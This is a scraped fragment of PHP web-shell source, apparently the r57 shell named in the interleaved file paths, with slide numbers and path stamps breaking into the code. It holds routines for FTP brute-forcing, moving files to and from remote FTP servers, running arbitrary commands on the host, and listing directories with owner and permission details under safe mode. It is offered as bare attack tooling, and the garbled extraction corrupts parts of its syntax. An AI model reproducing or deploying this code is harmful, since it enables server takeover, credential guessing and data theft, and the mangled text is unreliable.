if(chop($_POST[loc_file])==$dir) { $_POST[loc_file]=$dir.((!$unix)? ():(/)).basename($_POST[ftp_file]); } @ftp_get($connection,$_POST[loc_file],$_POST[ftp_file],$_POST[mode]); } if($_POST[cmd]=="ftp_file_up") { @ftp_put($connection,$_POST[ftp_file],$_POST[loc_file],$_POST[mode]);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  38. 38. } } } @ftp_close($connection); $_POST[cmd] = ""; } if(!empty($_POST[cmd]) && $_POST[cmd]=="ftp_brute") { list($ftp_server,$ftp_port) = split(":",$_POST[ftp_server_port]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); $_POST[cmd] = ""; } else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language._text96]."</b></div></font></td></tr></table>"; $_POST[cmd] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST[cmd])&&!$safe_mode) { $_POST[cmd]=(!$unix)?("dir"):("ls -lia"); } else if(empty($_POST[cmd])&&$safe_mode){ $_POST[cmd]="safe_dir"; } echo $font.$lang[$language._text1].": <b>".$_POST[cmd]."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; if($safe_mode) { switch($_POST[cmd]) { case safe_dir: $d=@dir($dir); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner[name],$grgid[name],$size); echo date("d.m.Y H:i ",$mtime); } echo "$filen"; } $d->close(); } else echo $lang[$language._text29]; break; case test1:file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]

×